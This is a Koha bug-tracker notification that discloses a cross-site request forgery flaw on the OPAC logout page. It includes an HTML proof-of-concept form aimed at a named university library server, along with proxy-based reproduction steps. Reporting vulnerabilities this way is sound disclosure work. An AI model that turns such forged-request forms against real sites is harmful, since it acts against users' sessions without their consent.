https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=23238 Bug ID: 23238 Summary: CSRF On Logout Page Change sponsored?: --- Product: Koha Version: unspecified Hardware: All OS: All Status: NEW Severity: normal Priority: P5 - low Component: Web services Assignee: koha-bugs@lists.koha-community.org Reporter: anuragmewar@gmail.com QA Contact: testopia@bugs.koha-community.org Created attachment 91132 --> https://bugs.koha-community.org/bugzilla3/attachment.cgi?id=91132&action=edit PFA the Google Drive link for the video Vulnerability: CSRF on logout page Vulnerability Description: Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. Vulnerable URL: https://ils.ddn.upes.ac.in:8001/cgi-bin/koha/opac-main.pl CSRF POC: <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://ils.ddn.upes.ac.in:8001/cgi-bin/koha/opac-main.pl"> <input type="hidden" name="logout.x" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> Steps to reproduce: 1. Login with valid credentials 2. Start any proxy tool to intercept the request. 3. Click logout 4. Send to "repeator" 5. Change "referer" header 6. Observe the output 7. Create an HTML file using the CSRF POC mentioned above 8. Login again 9. Open the CSRF html file on a new tab 10. Submit request 11. Results would reflect on main account POC: PFA the video -- You are receiving this mail because: You are the assignee for the bug. You are watching all bug changes.